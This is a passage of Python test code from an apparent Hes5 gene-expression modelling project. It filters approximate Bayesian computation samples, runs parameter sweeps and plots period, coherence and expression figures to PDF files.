model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]>0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_oscillating_bands_long_delay.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]<0.2, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_long_delay.pdf'))
def xest_plot_heterozygous_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_mrna_distribution.pdf'))
def xest_plot_low_transcription_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_low_transcription_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_low_transcription_mrna_distribution.pdf'))
def xest_plot_hill_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_period_distribution.pdf'))
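        # refine the filter: additionally require a Hill coefficient below 6
        # (prior column 4) and plot the period distribution of that subset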
new_accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,4]<6))))) #hill
new_periods = model_results[new_accepted_indices][:,2]
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
plt.hist(new_periods, bins = 200)
# plt.hist(new_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.xlim(0,500)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_6_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_mrna_distribution.pdf'))
def xest_plot_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution.pdf'))
def xest_plot_langevin_abc_in_band_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_bands_long_delay.pdf'))
def xest_make_heterozygous_degradation_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 100
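        # sweep the protein degradation rate at each accepted posterior sample
        # drawn from the heterozygous expression band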
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
        # saved under a heterozygous-specific name (assumed intent): the method
        # below writes multiple_degradation_sweep_results_new.npy and would
        # otherwise overwrite this result
        np.save(os.path.join(os.path.dirname(__file__), 'output','heterozygous_degradation_sweep_results_new.npy'),
                my_parameter_sweep_results)
def xest_make_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
np.save(os.path.join(os.path.dirname(__file__), 'output','multiple_degradation_sweep_results_new.npy'),
my_parameter_sweep_results)
def xest_plot_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'output','multiple_degradation_sweep_results_new.npy'))
# new_accepted_indices = np.where( my_posterior_samples[:,0] < 10 )
# my_parameter_sweep_results = my_parameter_sweep_results[new_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.01)
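        # reference line: degradation rate corresponding to a 90 min Hes5
        # protein half-life, i.e. ln(2)/90 per minute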
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Period [min]')
plt.ylim(0,700)
my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.01)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
my_figure.add_subplot(133)
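        # column 1 holds the mean expression and column 2 the relative standard
        # deviation, so the absolute error bar is their product (scaled by 1e4)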
for results_table in my_parameter_sweep_results:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.01)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(0,15)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Expression/1e4')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_degradation_sweep.pdf'))
def xest_make_all_multiple_parameter_variation_hill_low_transcription(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_parameter_sweeps_hill_low_transcription' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_all_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_parameter_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_heterozygous_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_heterozygous_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_logarithmic_degradation_rate_sweep(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_sweep_results = hes5.conduct_parameter_sweep_at_parameters('protein_degradation_rate',
my_posterior_samples,
number_of_sweep_values = number_of_parameter_points,
number_of_traces_per_parameter = number_of_trajectories,
relative = False)
np.save(os.path.join(os.path.dirname(__file__), 'output','logarithmic_degradation_sweep.npy'),
my_sweep_results)
def xest_plot_bifurcation_implementation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
# np.logical_and(model_results[:,1]>0.05,
# model_results[:,3]<0.1))))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,1]<10))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
new_accepted_indices = np.where(my_posterior_samples[:,1]<10)
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'logarithmic_degradation_sweep.npy'))
# my_indices = np.where(np.logical_and(my_degradation_sweep_results[:,3,4]>0.1,
# my_degradation_sweep_results[:,3,4]<0.2))
# my_degradation_sweep_results = my_degradation_sweep_results[new_accepted_indices]
x_coord = -0.3
y_coord = 1.05
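        # x_coord/y_coord position the panel labels; the sweep curves are drawn
        # at zorder 0 and rasterized via set_rasterization_zorder(1) below,
        # which keeps the saved PDF small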
for results_table in my_degradation_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
# plt.ylim(0,0.3)
my_figure.add_subplot(132)
hill_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_hill_coefficient.npy'))
# my_indices = np.where(np.logical_and(hill_sweep_results[:,9,4]>0.1,
# hill_sweep_results[:,9,4]<0.2))
# hill_sweep_results = hill_sweep_results[my_indices]
for results_table in hill_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('rel. Hill coefficient')
plt.axvline( 1.0, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
# plt.ylabel('Coherence')
# plt.ylim(0,0.3)
plt.ylim(0,1)
my_figure.add_subplot(133)
delay_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_time_delay.npy'))
# delay_sweep_results = delay_sweep_results[my_indices]
for results_table in delay_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.axvline( 1.0, color = 'darkblue')
plt.xlabel('rel. Transcription delay')
plt.gca().text(x_coord, y_coord, 'C', transform=plt.gca().transAxes)
# plt.ylabel('Coherence')
# plt.ylim(0,0.3)
plt.ylim(0,1)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','bifurcation_illustration.pdf'), dpi = 400)
def xest_plot_logarithmic_degradation_sweep(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'logarithmic_degradation_sweep.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.005)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Period [min]')
plt.ylim(0,700)
my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.005)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.005)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(0,15)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Expression/1e4')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_degradation_sweep.pdf'))
def xest_make_logarithmic_relative_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','logarithmic_relative_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_hill_relative_parameter_variation_low_transcription_rate(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','hill_relative_sweeps_low_transcription' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_hill_relative_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','hill_relative_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_hill_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
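            # keep only samples that are non-oscillatory at sweep position 9
            # (coherence < 0.1) and whose period just below the reference
            # position stays under 400 min; position 9 is assumed to sit at or
            # near the unperturbed parameter value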
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,
reference_indices[parameter_name] -1 ,3] < 400))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1.0)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hill_all_relative_sweep_' + parameter_name + '.pdf'))
def xest_plot_hill_relative_parameter_variation_transitions(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
        other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
        # these indices refer to the accepted subset, so apply them to
        # accepted_model_results rather than the full model_results array
        accepted_model_results = accepted_model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
